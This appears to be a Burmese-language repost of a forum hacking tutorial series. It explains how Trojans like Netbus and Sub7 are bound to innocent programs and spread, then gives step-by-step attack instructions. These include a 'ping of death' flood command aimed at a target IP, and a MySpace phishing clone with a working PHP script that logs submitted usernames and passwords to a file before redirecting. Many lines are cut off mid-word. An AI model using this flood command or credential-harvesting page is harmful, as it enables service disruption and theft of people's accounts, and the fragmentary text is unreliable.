Netbios သည္ေရွးက်ေသာ စနစ္က်ဳးေက်ာ္ေသာ နည္းလမ္းတစ္ခုျဖစ္ပါသည္။ စနစ္မ်ားစြာသည္ ပံုမွန္ ကာကြယ္ေပးထားသျဖင့္ တစ္ခ်ိဳ႕သည္ သတိမမူမိပဲ ေသခ်ာကာကြယ္မွဳ အတ္ုင္းအဆမ်ား မလုပ္မိေသာေၾကာင့္ ေနာက္ပိုင္းတြင္ Netbios Attack သည္ လုပ္ခံရေသာ သားေကာင္မ်ား ျပန္လည္ျမင့္မားလာရသည္။
ဒီစာအုပ္ေနာက္ပိုင္းတြင္ အေျခခံကာကြယ္နည္းအခ်ိဳ႕ကို ေရးသားသြားပါမည္။ ဒီေနရာထိတုိင္ေအာင္ အလားအလာရွိေသာ အားနည္းခ်က္မ်ားကို ေရးသားရန္ စိတ္အားသန္ေနပါသျဖင့္ ေစာင့္ဖတ္ရန္ ေျပာၾကားလိုပါသည္။
ဟက္ကာမ်ားဧ။္ လွ်ိဳ႕ဝွက္ခ်က္ ကို ေဖာ္ထုတ္ျခင္းႏွင့္ မွ်ေဝျခင္း (၂)....
အခန္း ၂ (Trojan Horse (လွ်ိဳ႕ဝွက္ဝင္လာေသာ ရန္သူ႕လက္ပါးေစ))ကၽႊန္ေတာ္ Trojan Horse ရဲ့ ကြန္ပ်ဳတာႏွင့္မသက္ဆိုင္ေသာ သမိုင္းဇာတ္လမ္းေလးကို အစကမေျပာမလို႔ပဲ။ လူတိုင္းသိတယ္ထင္လို႔ပါ။ ဒါေပမဲ့ မသိတဲ့လူေတြရွိရင္ ဒါေလးသိရင္ ပိုၿပီးနားလည္မယ္ထင္လို႔ ထည့္ေရးလိုက္တာပါ။
ဒါက Trojan War လို႔ေခၚတဲ့ Greek ႏွင့္ Troy ၁၀ ႏွစ္ၾကာ စစ္ပဲြမွာ Troy ေတြရဲ့ ၁၀ ႏွစ္ၾကာအဝိုင္းခံေနရတဲ့ Greek ကသူ႕ၿမိဳ႕ကို စြန္႔ခြါသြားတဲ့ ပံုစံႏွင့္ ဟန္ေဆာင္ၿပီး ဂရိစစ္သည္အခ်ိဳ႕ကို ႀကီးမားတဲ့ ျမင္းရုပ္ႀကီးထဲထည့္ၿပီး ထားခဲ့ပါတယ္။ Troy ေတြက စစ္ေအာင္တဲ့ အထိမ္းအမွတ္နဲ႔ ျမင္းရုပ္ႀကီး သူတို႔ၿမိဳ႕ႀကီးထဲ သြင္းခဲ့တယ္။ ညက်ေတာ့မွ စစ္သည္ေတြဟာ ထြက္လာၿပီး ဂရိၿမိဳ႕တံခါးကိုဖြင့္ၿပီး တိတ္တဆိတ္ျပန္လာတဲ့ ဂရိစစ္တပ္အတြက္ တံခါးဖြင့္ေပးခဲ့ပါတယ္။ ထို႔ေနာက္ Troy ေတြရဲ့ ဝိုင္းခံထားရတဲ့ ဂရိေတြဟာ စစ္ပဲြကို ၿပီးဆံုးယံုတာမက Troy ေတြကို ေခ်မွဳန္းႏိုင္ခဲ့ပါတယ္။ ဒီမွာ လွည့္စားမွဳက ျမင္းရုပ္ပါ။ ဒီ Trojan Horse ရုပ္ထုကိုတာ Troy ေတြသူတို႔ၿမိဳ႕ထဲ မသြင္းခဲ့ရင္ Troy ေတြအႏိုင္ရႏိုင္မွာပါ။ ဒါေပမဲ့ သူတို႔ရဲ့ အားနည္းမွဳကို သူတို႔ဘာသာဖြင့္ေပးေအာင္ ေထာင္ေခ်ာက္ဆင္ခဲ့ႏိုင္ပါတယ္။ ဘယ္ေလာက္လွပတဲ့ လံုၿခံဳေရးအားနည္းခ်က္ကို မိမိကိုယ္တိုင္ဝင္ခြင့္ေပးေအာင္
ဒီလုိပါပဲ။ ကြန္ပ်ဳတာစနစ္ေတာ္ေတာ္မ်ားမ်ား
Trojan ဆိုတာ ဟက္ကာေတြကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာကို လံုးဝထိန္းခ်ဳပ္ႏိုင္ခြင့္ေပးတဲ
Trojans ေတြလုပ္ေဆာင္ေပးႏိုင္တဲ့ အဓိကထင္ရွားတဲ့ လုပ္ငန္း ၆ ရပ္က
[list=1]
Remote Accessing (မိမိဧ။္ကြန္ပ်ဳတာကို တစ္ျခားအသံုးျပဳသူအတြက္ အေဝးတစ္ေနရာမွ အသံုးခ်ႏိုင္ေအာင္ျပဳလုပ္ေပးျ
Data Destruction (အခ်က္အလက္မ်ား ဖ်က္ဆီးပစ္ျခင္း)
Downloader (မိမိဧ။္ ကြန္ပ်ဳတာေပၚမွ အခ်က္အလက္မ်ားကို တစ္ျခားတစ္ေနရာသို႔ ေပးပို႔ႏိုင္ရင္ ကူညီေပးျခင္း) မွတ္ခ်က္ - သားေကာင္ဖက္ဆိုရင္ Uploader သေဘာျဖစ္ၿပီး၊ ဟက္ကာဖက္က Downloader သေဘာပါ။
Server Trojan (Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
Security Software Disabler (မိမိဧ။္ ကြန္ပ်ဳတာေပၚမွာ လံုၿခံဳေရးအတိုင္းအတာမ်ားကို အလုပ္မလုပ္ရန္ျပဳလုပ္ျခင္း)
Denial of Service attack (DoS) (မိမိဧ။္ ကြန္ပ်ဳတာမွ တစ္ျခား ကြန္ရက္ေပၚမွ ကြန္ပ်ဳတာမ်ားကို DoS attack ျဖင့္တိုက္ခိုက္ျခင္း) မွတ္ခ်က္ - ဟက္ကာတစ္ေယာက္ဟာ သူဧ။္ ထိန္းခ်ဳပ္မွဳေအာက္မွ သားေကာင္မ်ားကိုအသံုးျပဳ၍ တစ္ျခားကြန္ရက္ကို တိုက္ခိုက္ရာတြင္ အသံုးျပဳပါသည္။ BotNet Attack ေခၚတဲ့ ေနရာမွာ အသံုးခ်ပါတယ္။ Grid Computing ဆိုတဲ့ နည္းပညာကလာတဲ့ အေတြးအေခၚေလးတစ္ခုပါ။ Grid Computing ဆိုတာ ကြန္ရက္ႏွင့္ ခ်ိတ္ဆက္ထားေသာ ကြန္ပ်ဳတာမ်ားဧ။္ စြမ္းရည္ကို ေဝငွသံုးစြဲ၍ လုပ္ငန္းမ်ားကို စြမ္းအင္ျမင့္ျမင့္ လုပ္ေဆာင္ျခင္းျဖစ္ပါသည္။ ကၽႊန္ေတာ့္ဆီမွာ Distribute Password ေဖၚတဲ့ Software ဟာ ဒီလိုမ်ဳိးလုပ္ေပးပါတယ္။
ထင္ရွားတဲ့ ပ်က္စီးမွဳေတြကေတာ့ လုပ္ေပးႏိုင္တာကေတာ့ ေအာက္ပါထဲက တစ္ခ်ိဳ႕ျဖစ္ပါတယ္။
[list=1]
ကြန္ပ်ဳတာေပၚက ေဒတာေတြကို ဖ်က္ပစ္ျခင္း၊ အေပၚကေန ထပ္ေရးျခင္း
အသံုးျပဳတူက သိရွိ၍ Trojan ဖ်က္ပစ္ပါက ထပ္ၿပီး Trojan ကို ျပန္သြင္းျခင္း
ဖိုင္ေတြကို cryptoviral extortion attack လို႔ေခၚတဲ့ နည္းပညာျဖင့္ (Encrypt) ဝွက္စာျပဳလုပ္ျခင္း။ ဒါကဘာလဲဆိုေတာ့ Trojan ေရးတဲ့ ကိုယ္တိုင္လူမွ ဒါမွမဟုတ္ ဒီ Attack ကိုလုပ္တဲ့ လူကသာျပန္ Decrypt လုပ္ႏိုင္ျခင္းပါ။ ေနာက္ပိုင္း Backdoor ျပဳလုပ္တဲ့နည္းလမ္းကို ဒီနည္းပညာနဲ႔အဆင့္ျမွင့္ ထားပါတယ္။ ဘာထူးျခားလဲဆိုေတာ့ Trojan ကေန Backdoor ကိုဖြင့္ေပးထားတဲ့ Port ကို တိုက္ခိုက္တဲ့လူကလြဲရင္ သံုးလို႔မရပါဘူး တစ္ေယာက္ကေတြ႕ရွိခဲ့ရင္ေတာင္ ဘယ္လိုမွကာကြယ္၊ ဖယ္ရွား၊ စစ္ေဆးလို႔မရပါဘူး။
ေနာက္ထပ္ Adware, Spyware, and Viruses မ်ားကို အလြယ္တကူသြင္းလို႔ရေအာင္ ကူညီပါတယ္။
Keylogger အေနျဖင့္ အသံုးခ်ျခင္း (keylogger ဆိုသည္မွာ စာဖတ္သူရိုက္လိုက္တဲ့ keystrokes ေတြကို Hacker ဆီပို႔ေပးျခင္း) အထင္မေသးပါနဲ႔ ဒီနည္းနဲ႔ စာဖတ္သူဧ။္ Bank Info၊ Personal Life ေတြပါသြားႏိုင္ပါသည္။
Phising ျပဳလုပ္ျခင္း (စာဖတ္သူကိုလည္းေကာင္း၊ စာဖတ္သူ IP ကိုအသံုးျပဳ၍ တစ္ျခားသားေကာင္မ်ားကို လွည့္ျဖားရာတြင္ အကာအကြယ္ျပဳလုပ္ျခင္း)
DDoS attack တြင္ စာဖတ္သူဧ။္ စက္ကို Zombie အေနႏွင့္အသံုးျချခင္း
Fake Email Accounts မ်ား၊ Email Servers မ်ား စာဖတ္သူဧ။္ စက္ေပၚတြင္ တည္ေဆာက္ျခင္း (သို႔) စာဖတ္သူဧ။္ Email Account ကိုအသံုးျပဳ၍ Spam မ်ားပို႔ေဆာင္ျခင္းတို႔ ျဖစ္ပါသည္။
ဒါေတြကို ထပ္သိခ်င္ရင္ေတာ့ Wiki မွာသြားၾကည့္ပါ။ ဒါေတြက နည္းနည္းသစ္တာနဲ႔ အဓိကအခ်က္ေတြကို ေရးထားသာပါ။
အထင္ရွားဆံုးထဲက Trojans ေတြထဲက ႏွစ္ခုကေတာ့ Netbus ႏွင့္ Sub7 တို႔ျဖစ္ပါတယ္။ Trojans တိုင္းကဲ့သို႕ Netbus မွာ ႏွစ္ပိုင္းပါဝင္ပါတယ္။ Client ႏွင့္ Server အပိုင္းပဲျဖစ္ပါတယ္။ Server အပိုင္းကေတာ့ စာဖတ္သူရဲ့ စက္ကို သံုးစြဲရန္ ဟက္ကာက စာဖက္သူစက္ေပၚမွာ သြင္းေပးရတဲ့ Program ပါ။ ထုိသို႔ျပဳလုပ္ရန္ ဟက္ကာတစ္ေယာက္က ဘယ္လိုခ်ိဳးေဖာက္မလဲဆိုေတာ့
ခ်ိဳးေဖာက္ျခင္း
ရည္မွန္းခ်က္ : အလားအလာရွိတဲ့ သားေကာင္ကို ေရြးခ်ယ္၍ Server ကို သားေကာင္ကိုယ္တိုင္ သားေကာင္ဧ။္စက္ေပၚတြင္ သြင္းေစရန္ႀကိဳးစားျခင္း
နည္းလမ္း ၁
Server file (ဥပမာ အားျဖင့္ netbuserver.exe ဟုကၽႊန္ေတာ္ ဒီမွာ ေခၚဆိုပါမည္) ကို စာဖတ္သူဧ။္ email သို႔ေပးပို႔ျခင္း။ ဒီနည္းဟာ ေရွးအက်ဆံုးနည္းပါ။ ဒါေပမဲ့ ဒါကို သတိမမူလို႔ ေထာင္ခ်က္ထဲက်လာတဲ့ သားေကာင္ေတြ ခုထက္ထိ မနည္းပါဘူး။ ဒီလိုေလး လြယ္လြယ္ေလးလုပ္ႏိုင္ပါသည္။ ဟက္ကာသည္ အထက္ပါ file ကို Game File ဟုဆို၍လည္းေကာင္း၊ ေပ်ာ္စရာ File တစ္ခုဟု ေျပာဆိုကာ ေပးပို႔လိုက္ပါမယ္။ ဒါေပမဲ့ ဘာမွမေပၚလာပါဘူး စာေရးသူ ဖြင့္ၾကည့္ေသာအခါ။ (သံသရ ျဖစ္စရာပါပဲ )
စာေရးသူ ဒီလိုမ်ိဳး ကိုယ္မသိတဲ့ File ကိုမသိပဲနဲ႔ Double Click လုပ္ၿပီး ဖြင့္ၾကည့္ၿပီးေတ့ာ ဘာမွမျမင္ရတာ ဘယ္ႏွစ္ႀကိမ္ရွိလဲ စဥ္းစားၾကည့္ပါ။
ဒီအခ်ိန္မွာ ဘာျဖစ္ခဲ့လဲဆိုေတာ့ Server ဆိုတဲ့ File ကို စာဖတ္သူဧ။္ စနစ္ေပၚမွာ သြင္းၿပီးသြားၿပီ ျဖစ္ပါတယ္။ ေနာက္ထပ္ လုပ္စရာလိုတာကေတာ့ Client ဆိုတဲ့ File ကို ဟက္ကာကေန Run လိုက္ၿပီး စာဖတ္သူဧ။္ စနစ္ကို ဆက္သြယ္ရံုပါပဲ။ ဒီအခ်ိန္ကစၿပီး စာဖတ္သူဧ။္ စနစ္ကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာေရွ႕ွမွာ ထုိင္သံုးကဲ့သို႔ပါပဲ။
ဒီလိုမ်ိဳး လုပ္တာမ်ားလာလုိ႔ လူေတြသတိထားမိလာေသာအခါ အရမ္းကို ညဏ္စူးရွတဲ့ ဟက္ကာေတြက ဒုတိယနည္းလမ္းကို ေျပာင္းသံုးၾကပါတယ္။
နည္းလမ္း ၂
စာဖတ္သူဟာ စာဖတ္သူရဲ့ သူငယ္ခ်င္းဆီက ဆိုၿပီး Flash Games ေတြဘာေတြ ဘယ္ႏွစ္ခါရဘူးပါလဲ။ Saddam ကို ဗံုးႀကဲတာတို႔ Osama Bin Ladin ကို ေသနတ္နဲ႔ပစ္တာတို႔ ဘာတို႔ပါ။ Script ေတြပါတဲ့ Power Point File တို႔ေပါ့။ ဒီလိုမ်ိဳးဟာေတြ ကိုသံုးၿပီး စာဖတ္သူဧ။္ စက္ကိုထိန္းခ်ဳပ္ခြင့္ရရန္ ႀကိဳးစားႏိုင္ပါသည္။
Server ဆိုတဲ့ Trojan ႏွင့္ အမွန္အကန္ File တစ္ခုကို ေပါင္းစပ္ၿပီး Output File တစ္ခုအေနႏွင့္ ျပဳလုပ္ေပးႏိုင္တဲ့ Programs ေတြရွိပါတယ္။ ထုိ Software ေတြက File တစ္ခုအေနႏွင့္ထုတ္ေပးပါတယ္။ ဥပမာအေနနဲ႔ တင္စားရရင္ ေဖ်ာ္ရည္ထဲကို ေဆးခပ္သလိုေပါ့ဗ်ာ။ ဥပမာ Coke ႏွင့္ ေခါင္းခါေဆး ေရာထားတာကို ႀကိဳက္တဲ့အမည္တပ္လို႔ရသလို ေပါ့ ဟက္ကာကလဲ ဒီလိုလုပ္ပါလိမ့္မယ္
Chess.exe + netbuserver.exe = or အေနႏွင့္ထပ္ေပးလို႔ရပါတယ္။ ဒါက Chess.exe အစစ္ေတာ့မဟုတ္ဘူး ဒါေပမဲ့ Chess.exe ပါပဲ။ ကြဲျပားပံုကို အသိသာဆံုးက File Size နဲ႔ ဆံုးျဖတ္လို႔ရပါတယ္။
The original file: chess.exe size: 50,000 bytes
The new file (with Trojan): chess.exe size: 65,000 bytes
ဒါကို ဟက္ကာ တစ္ေယာက္ဟာ တစ္ေယာက္ေယာက္ဆီပို႔လို႔ရေအာင္ ၁၀ စကၠန္႔အတြင္း လုပ္ယူလို႔ရပါတယ္။ ဒါဆိုရင္ netbuserver.exe ပါေနတဲ့ chess.exe ကို ႏွိပ္လိုက္ရင္ စာဖတ္သူကြန္ပ်ဳတာ ေပၚမွာဖြင့္လုိက္ရင္ ဘာျဖစ္မလဲ။
အေျဖကေတာ့ chess game က ပံုမွန္အတိုင္းပဲ ပြင့္လာပါလိမ့္မယ္။ ဒီအႀကိမ္မွာေတာ့ စာဖတ္သူက သံသယျဖစ္မွာ မဟုတ္ပါဘူး ဘာျဖစ္လို႔လဲဆိုေတာ့ စာဖတ္သူထင္တဲ့အတိုင္း ေပၚလာလို႔ပါ။ ဒါေပမဲ့ စာဖတ္သူ မသိလိုက္တာကေတာ့ chess game ပြင့္လိုက္တဲ့ အခ်ိန္မွာပဲ netbuserver.exe ကိုတစ္ခါတည္း သြင္းၿပီးသားျဖစ္ပါတယ္။
Trojan ျဖင့္ ထိခိုက္ခံရတဲ့ ကြန္ပ်ဳတာဟာ ဒီ အခ်က္အလက္ေတြကို ဟက္ကာဆီျပန္ပို႔ပါလိမ့္မယ္။
Username : ဟက္ကာေတြက စာဖတ္သူကို ေခၚတဲ့ Nickname ပါ။
IP Add : စာဖတ္သူ ကြန္ရက္ကို ဆက္သြယ္ရင္ရတဲ့ လိပ္စာပါ။
Status : စာဖတ္သူ Online လား Offline လား ကို ဟက္ကာကို အသိေပးႏိုင္ပါတယ္။
ဒါေၾကာင့္ Dial Up ပဲျဖစ္ျဖစ္ အေရးမႀကီးပါဘူး။ ကြန္ရက္ႏွင့္ ခ်ိတ္ဆက္မွဳရွိတာနဲ႔ Program က သူ႕ဘာသာသူ အသိေပးမွာပါ။ စာဖတ္သူက ဒါေတြဘယ္လိုျဖစ္ႏိုင္မလဲ ေမးခြန္းရွိပါလိမ့္မယ္။ အေပၚမွာ ေဖၚျပထားတာက ဘယ္လိုထိန္းခ်ဳပ္ႏိုင္လဲထဲက နည္းလမ္းတစ္ခ်ဳိဳ႕ပါ။
ခုဆက္လက္ေရးမွာကေေတာ့ ဟက္ကာေတြက စာဖတ္သူဆီ trojans ေတြဘယ္လိုပို႔ႏိုင္လဲ ဆုိတာပါ။
News Group
ျမန္မာျပည္က လူေတြကေတာ့ အသံုးျပဳတဲ့လူရွားမွာပါ။ Articles ေတြကို Newsgroup မွာတင္ၿပီး Attachment ေတြကို ဖြင့္ၾကည့္ရန္ လိမ္လွည္ထားျခင္း
Forums
ဒါကေတာ့ အထူးတလည္ ရွင္းျပစရာမလိုဘူးထင္ပါတယ္။ ကၽႊန္ေတာ္တို႔ ျမန္မာဆိုင္ဘာမွာေတာ့ ဒါေတြမရွိပါဘူး။ ဒါေပမဲ့ တစ္ခ်ိဳ႕ကၽႊန္ေတာ္သံုးတဲ့တစ္ျခာ
Chat Channels (IRCs) and Instand Messengers (IMs such as GTlak, MSN, Jabbers, and Yahoo)
တစ္ခ်ိဳ႕ Chat Server ေတြမွာ Join တာႏွင့္ File Name.exe၊ File Name.jpg.vbs ဆိုၿပီး File ေတြ မိမိကြန္ပ်ဳတာကို ပို႔ခံႏိုင္ရပါတယ္။ သတိမထားမိတဲ့ အခ်ိန္မွာ ႏွိပ္မိသြားႏိုင္ပါတယ္။ IMs ေတြကေတာ့ ခုခ်ိန္မွာ အမ်ားဆံုးပို႔တဲ့ ေနရာေတြပါ။ ဝမ္းနည္းဖို႔ေကာင္းတာက စစ္တမ္းတစ္ခ်ိဳ႕အရ 80% အသံုးျပဳသူေတြဟာ သတိမထားမိပါဘူး။ ဥပမာ အေနႏွင့္ thayetmyo ဆိုၿပီးလား Gtalk ကေန ျပန္႔တဲ့ Vrius လား၊ Worm လား၊ မသိေခတ္စားလိုက္ပါေသးတယ္။ ကၽႊန္ေတာ္ကေတာ့ တစ္ခါမွ မခံရေတာ့ ဘာအမ်ိဳးအစားလဲ မသိလိုက္ပါဘူး။
ဒါကေတာ့ ကၽႊန္ေတာ္ အထူးတလည္ မေျပာေတာ့ပါဘူး။
Unsafe Web Sites
တစ္ခ်ိဳ႕ Official မဟုတ္တဲ့ site ေတြမွာ အမ်ားဆံုးေတြ႕ရပါတယ္။ အဲလိုမ်ိဳး Site ကေန Download လုပ္လိုက္တဲ့ file ေတြကို ဂရုထားသင့္ပါတယ္။
စကားခ်ပ္ - မပူပါနဲ႔ ဒီမွာ Cracked Software ေတြ ဒိုင္ခံတင္ေပးတဲ့ ကိုဖက္ဆီ၊ ကိုေကာင္း၊ ကိုေကာင္ေလး ႏွင့္ ဘဘဗိုင္းရပ္စ္တို႔ အရင္ခံရမွာပါ။
ျမင္တဲ့အတုိင္း ဒါကျဖန္႔ေဝလို႔ရတဲ့ နည္းေတြထဲက တစ္ခ်ိဳ႕ပါ။ အဲ ေနာက္ဆံုး ကၽႊန္ေတာ္စဥ္းစားမိတာကေတာ့ Social Networking Sites ေတြကပါ။ ဥပမာ Friendster, Facebook, and My Space လိုမ်ိဳးေတြကပါ။ ဟုိတစ္ေလာတုန္းကေတာင္ ေဘာ္ေဘာ္တစ္ေယာက္ရဲ့ ေကာင္မေလးစက္ Friendster ကေန တစ္ဆင့္ Injected လုပ္ခံရတာကို မွတ္မွတ္ရရ Clean ေပးလုိက္ရပါေသးတယ္။
ဒီ ဒုတိယ အခန္းကို ဖတ္ၿပီးေတာ့ စာဖတ္သူအရင္ကထက္ ကြန္ရက္ေပၚက အလားအလာရွိတဲ့ အႏၱရာယ္ေတြကို ပိုၿပီးသတိထားမိလာမယ္လို႔ ေမ်ာ္လင့္ပါတယ္။ ေနာက္တစ္ခန္းမွာေတာ့ ဘယ္လို file အမ်ိဳးအစားေတြကို လက္ခံႏုိင္လဲရင္ အႏၱရာယ္နည္းလဲကို ေျပာျပပါသြားမယ္။
ခုေတာ့ မနက္ ၄ နာရီ ထိုးၿပီ ဆိုေတာ့ အိပၿ္ပီဗ်ဳီ႕။
ဟက္ကာမ်ားဧ။္ လွ်ိဳ႕ဝွက္ခ်က္ ကို ေဖာ္ထုတ္ျခင္းႏွင့္ မွ်ေဝျခင္း (၃)....
- Dos Attack ဆိုတာ Denial of Service Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျ
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျ
- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္
ကိုေျပာင္းလဲႏိုင္ပါတယ္
-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္
မွာလည္းကိုေျပာျခင္းပါတယ္
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခို
- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။
အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။ တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္
ပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
အျပည္႕အစုံဖတ္ရန္
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထား
ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့
ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြ
Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္
header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါ
ေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password
ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿ
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿ
မွတ္ခ်က္ /
ျမန္မာဆုိင္ဘာဖိုရမ္မွ Special Member တဦးျဖစ္သူ ကုိသီဟ (thiha1myat ) ၏ ပို႕စ္အား ကူးယူေဖၚျပျခင္းျဖစ္ပါသည္ ။ သိလိုသည္မ်ားရွိပါက ေမးျမန္းနုိ္င္ပါတယ္ ။ ကုိသီဟမွ ျပန္လည္ေျဖၾကားသြားမွာ ျဖစ္ပါတယ္ ။